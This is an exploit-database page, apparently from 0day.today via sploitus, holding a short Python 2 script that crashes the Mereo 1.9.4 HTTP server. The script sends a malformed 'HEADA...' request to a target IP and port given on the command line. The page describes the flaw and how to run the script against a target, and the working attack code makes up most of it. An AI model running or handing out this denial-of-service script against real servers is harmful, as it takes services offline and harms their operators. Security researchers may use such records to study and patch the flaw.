Share
## https://sploitus.com/exploit?id=1337DAY-ID-34587
#!/usr/bin/python
''' 
# Exploit Title: Mereo 1.9.4 - Remote HTTP Server Denial of Service
# Exploit Author: Saeed reza Zamanian
# Vendor Homepage: https://sourceforge.net/projects/mereo/
# Software Link: https://sourceforge.net/projects/mereo/files/
# Version: 1.9.4
# Tested on: Windows 7 , Windows Vista
  
# Description : Mereo version 1.9.4 is vulnerable against DoS, An attacker can cause application crash with
sending a buffer like GET+One Character or Head+One Character eg. GETA or HEADA , Since the HTTP method is 
not supported with the application, so it will be caused to crash.
 Usage:
  python mereo194_dos.py 1.2.3.4 80
'''
import socket
import os
import sys


if len(sys.argv) != 3:
  print "Usage: python mereo194_dos.py targetIP targetPort"
else:

  print "[*] Sending evil http request to target"
  expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
  expl.connect((sys.argv[1], int(sys.argv[2])))
  expl.send("\x48\x45\x41\x44\x41\x41\x41\x41\x41\x41")
  expl.close()

#  0day.today [2020-07-19]  #